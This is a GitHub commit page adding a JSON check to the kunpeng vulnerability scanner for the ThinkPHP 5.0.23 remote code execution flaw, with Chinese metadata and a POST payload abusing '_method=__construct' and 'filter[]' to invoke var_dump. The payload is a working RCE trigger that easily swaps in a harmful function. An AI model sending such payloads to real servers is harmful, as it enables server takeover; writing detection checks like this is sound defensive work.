-
Notifications
You must be signed in to change notification settings - Fork 321
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge branch 'master' of https://github.com/ywolf/kunpeng
- Loading branch information
Showing
1 changed file
with
23 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
{ | ||
"target":"thinkphp", | ||
"meta":{ | ||
"name": "ThinkPHP5 5.0.23 远程代码执行漏洞", | ||
"remarks": "其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞,可导致服务器直接被入侵控制。", | ||
"level": 0, | ||
"type": "RCE", | ||
"author": "phith0n", | ||
"references": { | ||
"url":"https://github.com/vulhub/vulhub/blob/master/thinkphp/5.0.23-rce/README.zh-cn.md", | ||
"cve":"", | ||
"kpid":"KP-0079" | ||
} | ||
}, | ||
"request":{ | ||
"path": "/index.php?s=captcha", | ||
"postData": "_method=__construct&filter[]=var_dump&method=get&server[REQUEST_METHOD]=pGiopzVOki1L" | ||
}, | ||
"verify":{ | ||
"type": "string", | ||
"match": "string(12) \"pGiopzVOki1L\"" | ||
} | ||
} |